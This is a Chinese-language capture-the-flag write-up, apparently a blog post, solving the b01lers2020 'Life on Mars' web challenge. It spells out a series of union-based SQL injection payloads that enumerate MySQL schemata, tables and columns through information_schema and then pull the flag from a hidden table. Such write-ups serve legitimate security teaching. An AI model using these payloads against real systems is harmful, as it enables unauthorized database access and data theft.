[b01lers2020]Life on Mars

在这里插入图片描述
在这里插入图片描述
界面如下,点击可以看到各种信息,讲的是火星上的事物:
扫描一遍,没有发现任何东西:
并没有备份文件,猜测可能是一些框架的注入之类的,
在各页面抓包查看是否有可疑传参:

在这里插入图片描述
某一个页面,看到有类似查询的参数:
在这里插入图片描述
传参的数据如果是地名,则显示json形式的页面信息,尝试注入:
通过这个形式显示,信息:
在这里插入图片描述
尝试:

/query?search=amazonis_planitia union select version(),database()

在这里插入图片描述
将表名聚合在一起:爆出表名
对了,下面这是最常见的对没有过滤的sql注入进行查找的典型payload,用group_concat把某一信息聚合在一起,同时是从information_schema中查找,其是mysql自带的记录数据库元组字符规则的数据库,带有各种信息:

可以找到用户自己定义的表:
在这里插入图片描述

/query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema='aliens'

查表:
在这里插入图片描述
看不出什么,还是先爆其他的吧:

/query?search=amazonis_planitia union select 1,group_concat(schema_name) from information_schema.schemata

还是直接上代码爆出库名,和之前多出了两个库:
在这里插入图片描述
有个alien_code,可以看看;

/query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'alien_code'

在这里插入图片描述
只有一个表叫’code’
继续查询表中字段:

/query?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name = 'code'

在这里插入图片描述
有code和id两个字段,直接去code里面找:

/query?search=amazonis_planitia union select 1,group_concat(code) from alien_code.code

找到flag:
在这里插入图片描述

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

F1gh4

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值